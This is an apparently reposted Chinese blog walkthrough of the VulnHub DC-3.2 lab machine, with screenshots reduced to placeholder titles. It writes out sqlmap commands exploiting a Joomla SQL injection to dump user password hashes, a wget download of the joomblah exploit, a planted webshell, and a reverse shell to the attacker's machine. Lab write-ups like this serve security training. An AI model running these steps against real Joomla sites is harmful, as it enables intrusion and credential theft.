网站导航
> 文章列表 > vulnhub DC:3.2渗透笔记

vulnhub DC:3.2渗透笔记

网友: 文章列表 2024-03-21 22:56:16

vulnhub DC:3.2渗透笔记

kali ip :192.168.20.130

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/

信息收集

扫描靶机ip以及开放端口
vulnhub DC:3.2渗透笔记
vulnhub DC:3.2渗透笔记
开放了80端口访问一下

vulnhub DC:3.2渗透笔记

Welcome to DC-3.
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge.  :-)欢迎来到 DC-3。
这一次,只有一面旗帜,一个入口,没有任何线索。
要获得flag,您显然必须获得 root 权限。
如何成为 root 取决于您——当然,也取决于系统。
祝你好运 - 我希望你喜欢这个小挑战。 :-)

意思就是需要root权限了

查看Wapplayzer信息如下

vulnhub DC:3.2渗透笔记

使用的Joomla的CMS,使用joomscan(Joomla漏洞扫描器)扫描器扫描

joomscan --url http://192.168.20.129/

vulnhub DC:3.2渗透笔记

后台登录界面已发现

vulnhub DC:3.2渗透笔记

漏洞攻击

使用searchsploit搜索Joomla的漏洞

vulnhub DC:3.2渗透笔记

查看一下42033.txt文件

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

vulnhub DC:3.2渗透笔记

所以可以利用sqlmap进行注入

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

vulnhub DC:3.2渗透笔记

查看joomladb数据库

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

vulnhub DC:3.2渗透笔记

有user表,查看#__users的列

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

vulnhub DC:3.2渗透笔记

查看表name和password的值

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

得到加密密码

vulnhub DC:3.2渗透笔记

还有一种简单的方法,使用joomblash.py脚本

wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py

直接攻击即可得到加密的密码

vulnhub DC:3.2渗透笔记

使用john爆破密码,我将密文内容放在1文件中

vulnhub DC:3.2渗透笔记

得到密码snoopy,登录到系统

vulnhub DC:3.2渗透笔记

此处发现可以新增页面
vulnhub DC:3.2渗透笔记

写入一句话

vulnhub DC:3.2渗透笔记

木马路径http://192.168.20.129/templates/beez3/shell.php

蚁剑连接

vulnhub DC:3.2渗透笔记

当前权限位www-data

vulnhub DC:3.2渗透笔记

编写反弹shell,监听1234端口,反弹shell至kali,shell内容用的kali自带的位于/usr/share/webshells/php/php-reverse-shell.php并且修改参数
vulnhub DC:3.2渗透笔记
vulnhub DC:3.2渗透笔记

连接成功,写入交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

vulnhub DC:3.2渗透笔记

提权

使用uname -a发现是ubuntu16.04

vulnhub DC:3.2渗透笔记

使用searchsploit发现一个漏洞可以提权

vulnhub DC:3.2渗透笔记

查看txt文件

vulnhub DC:3.2渗透笔记

将压缩包下载下来上传服务器解压运行即可(这里我偷几张图,我没科学上网工具……)

vulnhub DC:3.2渗透笔记

vulnhub DC:3.2渗透笔记
vulnhub DC:3.2渗透笔记

网络标签:

相关问题